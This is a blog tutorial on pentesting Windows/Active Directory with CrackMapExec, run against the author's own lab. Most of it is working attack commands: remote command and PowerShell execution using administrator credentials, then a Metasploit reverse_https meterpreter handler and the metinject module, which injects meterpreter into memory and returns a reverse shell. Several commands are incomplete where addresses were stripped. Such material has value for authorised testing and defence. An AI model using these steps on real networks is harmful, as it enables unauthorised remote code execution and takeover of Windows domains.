Penetration Testing in Windows/Active Directory with Crackmapexec

Datetime:2016-08-23 01:08:25          Topic: Penetration Testing           Share

Crackmapexec is a swiss army knife for pentesting Windows/Active Directory environments. Active Directory (AD) is a directory service that Microsoft developed for Windows domain networks. It is included in most Windows Server operating systems as a set of processes and services.

First of all, to install crackmapexec run the following commands:

apt-get install -y libssl-dev libffi-dev python-dev build-essential

 I have already installed all the requirements that is why because it is showing already installed but you have to install them.

Now we will create a virtual environment for  crackmapexec with virtualenvwrapper.

virtualenvwrapperis a set of extensions to virtualenv tool. The extensions include wrappers for creating and deleting virtual environments and otherwise managing your development workflow, making it easier to work on more than one project at a time without introducing conflicts in their dependencies.

apt-get install virtualenvwrapper

source /usr/share/virtualenvwrapper/

mkvirtualenv CME

pip install git+

pip install crackmapexec

Now to execute a windows command remotely run the following command:

crackmapexec –u administrator –p  ‘Igni*******’ –x whoami

As you can see the server is Pwned and the output of the command is rajlab\administrator .

Here is the server IP running active directory service in the network. We can also execute a powershell command:

crackmapexec –u administrator –p  ‘Igni*******’ –X  ‘$PSVersionTable’

The command is executed successfully and the output can be seen as the version of the powershell.

If we don’t know the active directory server we can run crackmapexec on the whole network by giving the network range as in my case .

Now comes the turn to get a meterpreter shell , so start   metasploit with command msfconsole in a new terminal and set up the reverse handler :

use exploit/multi/handler

set payload windows/meterpreter/reverse_https

set lhost

set lport 444


Now on the previous terminal run command:

crackmapexec -u administrator -p  Ign******* -M metinject –o LHOST= LPORT=444

As you can see payload is executed successfully and a powershell script Invoke-Shellcode.ps1 is executed to gets the reverse meterpreter shell using the metinject module to directly inject meterpreter into memory.

Here –M is the Module to use.

As you can see we got the meterpreter shell.

Author: Himanshu Gupta is an InfoSec Researcher | Technical writer. You can follow him on  LinkedIn .

About List